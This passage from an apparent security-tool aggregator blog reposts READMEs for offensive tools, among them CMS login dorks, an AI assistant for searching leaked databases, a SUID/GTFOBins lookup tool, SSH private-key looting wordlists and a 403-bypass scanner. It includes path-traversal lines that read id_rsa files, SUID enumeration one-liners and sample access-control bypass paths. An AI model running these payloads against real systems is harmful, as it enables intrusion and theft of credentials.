<h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr /> <p>Medium articles for more dorks:</p> <p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> <p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-7402030000778680112024-03-13T08:30:00.001-03:002024-03-13T08:30:00.133-03:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" target="_blank" title="leaked">leaked</a> databases. This guide will help you set up and run the project on your local environment.</p><span><a name='more'></a></span><p><br /></p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong></li> </ol> <p>First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:</p> <p>git clone https://github.com/luijait/DarkGPT.git cd DarkGPT</p> <ol> <li><strong>Configure Environment Variables</strong></li> </ol> <p>You will need to set up some environment variables for the script to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code>:</p> <p>DEHASHED_API_KEY="your_dehashed_api_key_here"</p> <ol> <li><strong>Install Dependencies</strong></li> </ol> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <p>pip install -r requirements.txt 4. Then Run the project: python3 main.py</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35363097260777600322024-03-12T20:38:00.002-03:002024-03-12T20:38:28.523-03:00Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems<h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2><p><br /></p> <p><code>GTFOcli</code> it's a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for easy binaries search commands that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for binaries located into file;</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for binaries located into file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for binary <code>tar</code> and print output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for binaries located into file mounted as volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>An example of common use case for <code>gtfocli</code> is together with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>, without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16852404691714193012024-03-11T08:30:00.005-03:002024-03-11T08:30:00.134-03:00n0Mac - Yet Another Mac Changer!!!<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640" /></a></div><p><br /></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br /></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-36129257561929026772024-03-10T08:30:00.004-03:002024-03-10T08:30:00.149-03:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><div><br /></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br /> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a name='more'></a></span><div><br /></div> <br /><span style="font-size: large;"><b>What is a JWT Token?</b></span><br /> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.</p> <p>What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is to utilize them as <a href="https://www.kitploit.com/search/label/Access%20Tokens" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.</p> <br /><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br /> <p>This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.</p> <br /><span style="font-size: large;"><b>userid</b></span><br /> <ul> <li>The code snippet targets the key named "userid" stored in the payload section as an example.</li> <li>The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).</li> </ul> <p>The idea behind attempting to obscure the value of the key named "userid" is as follows:</p> <br /><b>Encryption:</b><br /> <ul> <li>The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.</li> <li>XOR operation is performed using a symmetric key.</li> <li>The resulting value is then encoded using Base64.</li> </ul> <br /><b>Decryption:</b><br /> <ul> <li>Encrypted data is decoded using Base64.</li> <li>Decryption is performed by XOR operation with the symmetric key.</li> <li>The original user ID and hashed timestamp are revealed in plaintext.</li> <li>The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.</li> </ul> <br /><b>Symmetric Key for XOR Encoding:</b><br /> <ul> <li>Various materials can be utilized for this key.</li> <li>It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>However, this key should be securely stored in the <a href="https://www.kitploit.com/search/label/Database%20Management" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>and..^^</p> <pre><code>in the example, the key is shown as { 'userid': 'random_value' },<br />making it apparent that it represents a user ID.<br /><br />However, this is merely for illustrative purposes.<br /><br />In practice, a predetermined and undisclosed name is typically used.<br />For example, 'a': 'changing_random_value'<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure. </li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br /><span style="font-size: x-large;"><b>And...</b></span><br /> <ul> <li>If you find this helpful, please the <strong>"star"</strong>:star2: to support further improvements.</li> </ul> <br /><span style="font-size: x-large;"><b>preview</b></span><br /> <pre><code># python3 main.py<br /><br />- Current Unix Timestamp: 1709160368<br />- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08<br /><br />- userid: 23243232<br />- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'<br />- JWT Secret key: yes_your_service_jwt_secret_key<br /><br />- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=<br />- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c<br /><br />- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q<br />- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}<br /><br /><br /># run again<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73888386767938395432024-03-09T08:30:00.001-03:002024-03-09T08:30:00.242-03:00SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640" /></a></div><p><br /></p><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br /> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa<br />?file=../../../../../../../../home/user/.ssh/id_rsa-cert<br /></code></pre> <br /><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="Wordlists">Wordlists</a> πποΈ</b></span><br /> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br /><span style="font-size: large;"><b>Wordlist Files π</b></span><br /> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br /><span style="font-size: large;"><b>Usage π</b></span><br /> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br /><span style="font-size: large;"><b>Acknowledgements π</b></span><br /> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="Hacking">Hacking</a> Trick." </p> <br /><span style="font-size: large;"><b>Disclaimer β οΈ</b></span><br /> <p>Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58469355253761489642024-03-08T17:36:00.003-03:002024-03-08T17:36:22.430-03:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br /> <p>Before you install and run <code>nomore403</code>, make sure you have the following: - Go 1.15 or higher installed on your machine.</p> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Releases</b></span><br /> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br /><span style="font-size: large;"><b>Compile from Source</b></span><br /> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403<br />cd nomore403<br />go get<br />go build<br /></code></pre> <br /><span style="font-size: x-large;"><b>Customization</b></span><br /> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. nomore403 will automatically incorporate these changes.</p> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Output example</b></span><br /> <pre><code> ________ ________ ________ ________ ________ ________ ________ ________ ________<br /> β± β± β²β± β²β± β± β²β± β²β± β²β± β²β± β± β²β± β²β±__ β²<br /> β± β± β± β± β± β± β± β± β± __β± β± β± β±__ β±<br /> β± β± β± β± β± _β± __/____ β± β± β±<br /> β²__β±_____β±β²________β±β²__β±__β±__β±β²________β±β²____β±___β±β²________β± β±____β±β²________β±β²________β± <br /><br />Target: https://domain.com/admin<br />Headers: false<br />Proxy: false<br />User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)<br />Method: GET<br />Payloads folder: payloads<br />Custom bypass IP: false<br />Follow Redirects: false<br />Rate Limit detection: false<br />Verbose: false<br /><br />βββββββββββββ DEFAULT REQUEST βββββββββββββ<br />403 429 bytes https://domain.com/admin<br /><br />βββββββββββββ VERB TAMPERING ββββββββββββββ<br /><br />βββββββββββββ HEADERS βββββββββββββββββββββ<br /><br />βββββββββββββ CUSTOM PATHS ββββββββββββββββ<br />200 2047 bytes https://domain.com/;///..admin<br /><br />βββββββββββββ HTTP VERSIONS βββββββββββββββ<br />403 429 bytes HTTP/1.0<br />403 429 bytes HTTP/1.1<br />403 429 bytes HTTP/2<br /><br />βββββββββββββ CASE SWITCHING ββββββββββββββ<br />200 2047 bytes https://domain.com/%61dmin<br /></code></pre> <br /><span style="font-size: large;"><b>Basic Usage</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin<br /></code></pre> <br /><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v<br /></code></pre> <br /><span style="font-size: large;"><b>Parse request from Burp</b></span><br /> <pre><code>./nomore403 --request-file request.txt<br /></code></pre> <br /><span style="font-size: large;"><b>Use <a href="https://www.kitploit.com/search/label/Custom%20Header" target="_blank" title="custom header">custom header</a> + specific IP address for bypasses</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8<br /></code></pre> <br /><span style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200<br /></code></pre> <br /><span style="font-size: x-large;"><b>Options</b></span><br /> <pre><code>./nomore403 -h<br />Command line application that automates different ways to bypass 40X codes.<br /><br />Usage:<br /> nomore403 [flags]<br /><br />Flags:<br /> -i, --bypass-ip string Use a specified IP address or hostname for <a href="https://www.kitploit.com/search/label/Bypassing" target="_blank" title="bypassing">bypassing</a> access controls. Injects this IP in headers like 'X-Forwarded-For'.<br /> -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).<br /> -f, --folder string Specify the folder location for payloads if not in the same directory as the executable.<br /> -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers.<br /> -h, --help help for nomore403<br /> --http Use HTTP instead of HTTPS for requests defined in the request file.<br /> -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.<br /> -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)<br /> --no-banner Disable the display of the startup banner (default: banner shown).<br /> -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'.<br /> --random-agent Enable the use of a randomly selected User-Agent.<br /> -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code.<br /> -r, --redirect Automatically follow redirects in responses.<br /> --request-file string Load request configuration and flags from a specified file.<br /> -u, --uri string Specify the target URL for the request.<br /> -a, --user-agent string pecify a custom User-Agent string for requests (default: 'nomore403').<br /> -v, --verbose Enable verbose output for detailed request/response logging.<br /></code></pre> <br /><span style="font-size: x-large;"><b>Contributing</b></span><br /> <p>We welcome contributions of all forms. Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br /><span style="font-size: x-large;"><b>Security Considerations</b></span><br /> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br /><span style="font-size: 